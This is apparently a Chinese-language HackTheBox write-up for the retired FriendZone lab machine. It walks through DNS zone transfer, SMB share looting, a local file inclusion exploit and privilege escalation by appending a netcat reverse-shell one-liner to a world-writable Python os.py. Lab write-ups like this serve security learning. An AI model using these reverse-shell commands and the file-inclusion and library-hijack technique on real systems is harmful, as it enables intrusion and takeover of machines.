HTB-靶机-FriendZone

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.123

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.123 -o ./FriendZone-autorecon

根据扫描结果显示，开放的21端口不能进行匿名登录，存在DNS服务，并且看到有开放443端口，显示证书信息跟域名friendzone.red相关，开了dns服务，我们查询一下

dig axfr friendzone.red @10.10.10.123

得知了所有的域名解析，直接添加hosts信息

echo "10.10.10.123 friendzone.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red" | sudo tee -a /etc/hosts

访问每个域名看看

访问https://administrator1.friendzone.red会显示一个登陆信息，这些都放着，我们来看看samba服务

enum4linux 10.10.10.123

上述命令会枚举所有Samba可能存在的信息，发现如下重要信息

得知有4个共享，有两个能访问，这里使用如下命令进行测试了一把

smbclient -N \\\\10.10.10.123\\general  
smbclient -N \\\\10.10.10.123\\Development  

发现共享文件夹general下面有个creds.txt文件下载下来是账号密码相关信息， 共享文件夹Development什么东西都没有，但是发现可以上传文件，我们再爆破下目录

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50 -k -u https://administrator1.friendzone.red/ -x php -o bmfxfriendzone-gobuster

得到上述目录我们访问login.php页面地址：https://administrator1.friendzone.red/login.php ，这里需要账号和密码输入上面从共享文件夹中获得的账号和密码登录成功了，显示如下信息

根据此提示访问下此页面看看

再次给出提示image_id=a.jpg&pagename=timestamp  这里可能存在文件包含漏洞可以利用，想到前面的共享文件夹可以上传文件，这刚好可以利用

上传配置好的反弹代码shell文件，本地监听端口开始进行文件包含

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/bmfx-reverser

成功反弹shell，通过使用pspy64和linenum.sh这两个文件得出目标靶机存在计划任务执行一个python脚本，而此python脚本import os库，且此os库文件权限是777，我们可以通过编辑此os.py库文件写入反弹代码进行提权

echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 8877 >/tmp/f')" >> /usr/lib/python2.7/os.py

成功拿shell